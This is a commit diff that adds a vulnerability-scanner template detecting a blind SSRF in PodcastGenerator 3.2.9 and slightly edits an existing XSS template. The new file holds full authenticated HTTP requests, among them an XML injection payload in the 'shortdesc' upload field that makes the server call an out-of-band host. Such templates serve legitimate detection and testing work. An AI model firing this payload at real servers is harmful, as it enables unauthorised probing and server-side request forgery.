Merge pull request #7612 from MrHarshvardhan/patch-5

PodcastGenerator-Blind_SSRF-via-XML_Injection.yaml
2023-10-30 18:31:23 +05:30 · 2023-10-30 18:31:23 +05:30 · c4494abca6
parent b7b5f9b9af b27800f38f
commit c4494abca6
2 changed files with 134 additions and 4 deletions
--- a/http/vulnerabilities/other/podcast-generator-ssrf.yaml
+++ b/http/vulnerabilities/other/podcast-generator-ssrf.yaml
@ -0,0 +1,132 @@
+id: podcast-generator-ssrf
+
+info:
+  name: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection
+  author: ritikchaddha,MrHarshvardhan
+  severity: high
+  description: |
+    This is a SSRF vulnerability via Xml injection found in PodcastGenerator 3.2.9.
+  reference:
+    - https://www.exploit-db.com/exploits/51565
+    - https://mirabbasagalarov.medium.com/podcastgenerator-3-2-9-blind-ssrf-via-xml-injection-3795804467df
+    - https://github.com/PodcastGenerator/PodcastGenerator
+  metadata:
+    verified: true
+  tags: podcastgenerator,ssrf,authenticated
+
+variables:
+  string: "{{rand_text_alpha(7)}}"
+
+requests:
+  - raw:
+      - |
+        POST /podcast/PodcastGenerator/admin/login.php?login=1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+      - |
+        GET /podcast/PodcastGenerator/admin/episodes_upload.php HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /podcast/PodcastGenerator/admin/episodes_upload.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1WfeHRSBn1aNkQQA
+
+        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
+        Content-Disposition: form-data; name="file"; filename="{{string}}.jpg"
+        Content-Type: image/jpeg
+
+        {{rand_text_alpha(50)}}
+        {{rand_text_alpha(50)}}
+
+        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
+        Content-Disposition: form-data; name="title"
+
+        {{string}}
+        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
+        Content-Disposition: form-data; name="shortdesc"
+
+        test]]></shortdescPG><imgPG path="">http://{{interactsh-url}}</imgPG><shortdescPG><![CDATA[test
+        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
+        Content-Disposition: form-data; name="category[ ]"
+
+        uncategorized
+        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
+        Content-Disposition: form-data; name="date"
+
+        2023-10-30
+        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
+        Content-Disposition: form-data; name="time"
+
+        12:26
+        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
+        Content-Disposition: form-data; name="episodecover"; filename=""
+        Content-Type: application/octet-stream
+
+
+        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
+        Content-Disposition: form-data; name="longdesc"
+
+
+        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
+        Content-Disposition: form-data; name="episodenum"
+
+
+        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
+        Content-Disposition: form-data; name="seasonnum"
+
+
+        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
+        Content-Disposition: form-data; name="itunesKeywords"
+
+
+        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
+        Content-Disposition: form-data; name="explicit"
+
+        no
+        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
+        Content-Disposition: form-data; name="authorname"
+
+        {{string}}
+        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
+        Content-Disposition: form-data; name="authoremail"
+
+        {{string}}@{{string}}.com
+        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
+        Content-Disposition: form-data; name="customtags"
+
+
+        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
+        Content-Disposition: form-data; name="token"
+
+        {{token}}
+        ------WebKitFormBoundary1WfeHRSBn1aNkQQA--
+
+    host-redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
+      - type: word
+        part: body_2
+        words:
+          - "Main Information"
+          - "Episode Cover:"
+        condition: and
+
+    extractors:
+      - type: regex
+        part: body_2
+        name: token
+        group: 1
+        regex:
+          - 'pe="hidden" name="token" value="([A-Za-z0-9]+)">'
+        internal: true
--- a/http/vulnerabilities/other/universal-media-xss.yaml
+++ b/http/vulnerabilities/other/universal-media-xss.yaml
@ -10,8 +10,8 @@ info:
  reference:
    - https://packetstormsecurity.com/files/171754/Universal-Media-Server-13.2.1-Cross-Site-Scripting.html
  metadata:
-    verified: true
    max-request: 1
+    verified: true
    shodan-query: http.favicon.hash:-902890504
  tags: xss,universal,media,unauth,packetstorm

@ -36,6 +36,4 @@ http:

      - type: status
        status:
-          - 200
-
-# digest: 4b0a00483046022100a1755de63304dd0f1d4875235a52bc25ad20c53dfbf9cda0d692aa251eb7931d022100c8296657542a2509c3a9157a1e692a0c8be39e624d9195ca8b97178cf9155fbf:922c64590222798bb761d5b6d8e72950
+          - 200